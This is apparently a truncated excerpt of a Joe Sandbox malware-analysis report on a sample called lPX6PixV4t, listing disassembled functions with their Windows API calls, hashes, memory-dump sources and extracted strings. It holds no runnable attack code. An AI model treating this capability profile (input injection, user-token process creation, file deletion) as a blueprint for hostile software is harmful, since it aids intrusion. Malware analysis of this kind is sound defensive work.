                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                          • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                          • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __lock_file
                          • String ID:
                          • API String ID: 3031932315-0
                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                          APIs
                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wfsopen
                          • String ID:
                          • API String ID: 197181222-0
                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                          APIs
                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 03F517E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction ID: d0294eea1ca29ac17500de005345eabeae500d30cf37372467cbe4c1b74007cf
                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction Fuzzy Hash: A0E0BF7494010EEFDB00EFA8D5496DE7BB4EF04301F1005A1FD05D7680DB309E54CA62
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 03F517E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 300f3e3c24070c7c7f73010a48f179853a5dd6752f0dbfbcacedbcbd01a618d0
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: C0E0E67494010EDFDB00EFB8D54969E7FB4EF04301F1005A1FD01D2280DA309D50CA62
                          APIs
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                          • GetKeyState.USER32(00000011), ref: 0047C92D
                          • GetKeyState.USER32(00000009), ref: 0047C936
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                          • GetKeyState.USER32(00000010), ref: 0047C953
                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                          • _wcsncpy.LIBCMT ref: 0047CA29
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                          • SendMessageW.USER32 ref: 0047CA7F
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                          • ImageList_SetDragCursorImage.COMCTL32(00B52B48,00000000,00000000,00000000), ref: 0047CB9B
                          • ImageList_BeginDrag.COMCTL32(00B52B48,00000000,000000F8,000000F0), ref: 0047CBAC
                          • SetCapture.USER32(?), ref: 0047CBB6
                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                          • ReleaseCapture.USER32 ref: 0047CC3A
                          • GetCursorPos.USER32(?), ref: 0047CC72
                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                          • SendMessageW.USER32 ref: 0047CD12
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                          • SendMessageW.USER32 ref: 0047CD80
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                          • GetCursorPos.USER32(?), ref: 0047CDC8
                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                          • GetParent.USER32(00000000), ref: 0047CDF7
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                          • SendMessageW.USER32 ref: 0047CE93
                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,00A81AB8,00000000,?,?,?,?), ref: 0047CF1C
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                          • SendMessageW.USER32 ref: 0047CF6B
                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,00A81AB8,00000000,?,?,?,?), ref: 0047CFE6
                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3100379633-4164748364
                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                          APIs
                          • GetForegroundWindow.USER32 ref: 00434420
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                          • IsIconic.USER32(?), ref: 0043444F
                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                          • SetForegroundWindow.USER32(?), ref: 0043446A
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 2889586943-2988720461
                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                          APIs
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                          • CloseHandle.KERNEL32(?), ref: 004463A0
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                          • GetProcessWindowStation.USER32 ref: 004463D1
                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                          • _wcslen.LIBCMT ref: 00446498
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • _wcsncpy.LIBCMT ref: 004464C0
                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                          • CloseDesktop.USER32(?), ref: 0044657A
                          • SetProcessWindowStation.USER32(?), ref: 00446588
                          • CloseHandle.KERNEL32(?), ref: 00446592
                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                          • String ID: $@OH$default$winsta0
                          • API String ID: 3324942560-3791954436
                          • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                          • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                          APIs
                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                          • _wcscat.LIBCMT ref: 0044BD94
                          • _wcscat.LIBCMT ref: 0044BDBD
                          • __wsplitpath.LIBCMT ref: 0044BDEA
                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                          • _wcscpy.LIBCMT ref: 0044BE71
                          • _wcscat.LIBCMT ref: 0044BE83
                          • _wcscat.LIBCMT ref: 0044BE95
                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 2188072990-1173974218
                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                          • FindClose.KERNEL32(00000000), ref: 00478924
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                          • __swprintf.LIBCMT ref: 004789D3
                          • __swprintf.LIBCMT ref: 00478A1D
                          • __swprintf.LIBCMT ref: 00478A4B
                          • __swprintf.LIBCMT ref: 00478A79
                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                          • __swprintf.LIBCMT ref: 00478AA7
                          • __swprintf.LIBCMT ref: 00478AD5
                          • __swprintf.LIBCMT ref: 00478B03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 999945258-2428617273
                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                          • __wsplitpath.LIBCMT ref: 00403492
                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                          • _wcscpy.LIBCMT ref: 004034A7
                          • _wcscat.LIBCMT ref: 004034BC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                          • _wcscpy.LIBCMT ref: 004035A0
                          • _wcslen.LIBCMT ref: 00403623
                          • _wcslen.LIBCMT ref: 0040367D
                          Strings
                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                          • Unterminated string, xrefs: 00428348
                          • _, xrefs: 0040371C
                          • Error opening the file, xrefs: 00428231
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
